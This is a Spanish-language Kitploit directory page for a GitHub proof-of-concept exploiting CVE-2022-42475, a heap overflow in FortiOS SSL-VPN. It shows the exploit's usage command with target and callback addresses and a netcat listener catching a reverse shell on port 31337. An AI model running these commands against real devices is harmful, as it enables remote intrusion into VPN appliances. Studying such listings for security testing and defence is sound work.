Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
cve-2022-42475 — Vulnerabilidad de desbordamiento de búfer en FortiOS | Kitploit
Herramientas/GitHubGitHub/amir-hy/cve-2022-42475
Análisis de VulnerabilidadesExplotaciónPruebas de PenetraciónAprendizaje y EducaciónExplotación de Binarios
GitHubamir-hy/cve-2022-42475

cve-2022-42475

Vulnerabilidad de desbordamiento de búfer en FortiOS

Ver Repositorio
711hace 3 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Vulnerabilidad de desbordamiento de búfer en SSL-VPN de FortiOS

cve-2022-42475

https://nvd.nist.gov/vuln/detail/CVE-2022-42475 Código POC para explotar el desbordamiento de montón (Heap overflow) en el demonio SSLVPN de Fortinet

Notas

Este es un POC rápido y sucio que probablemente no funcione en ningún lugar a menos que tengas mucha suerte. Depende de la versión y contiene algunos offsets hardcodeados que probablemente cambiarán de un sistema a otro.

Uso

python3 cve-2022-42475.py rhost rport lhost 'command'

root@kitploit:~
python3 cve-2022-42475.py 192.168.10.1 8443 10.10.1.1 'ls -la /'

Listener

El POC utiliza un comando de Python para configurar una shell reversa en el puerto 31337

root@kitploit:~
nc -lvnp 31337

Descargo de responsabilidad

Este proyecto está hecho únicamente con fines educativos y de pruebas éticas. El uso de esta herramienta para atacar objetivos sin consentimiento mutuo previo es ilegal. Los desarrolladores no asumen ninguna responsabilidad y no son responsables de cualquier mal uso o daño causado por esta herramienta.

Descargar herramienta

Menciones

Gracias a Alain M - Twitter : @plopz0r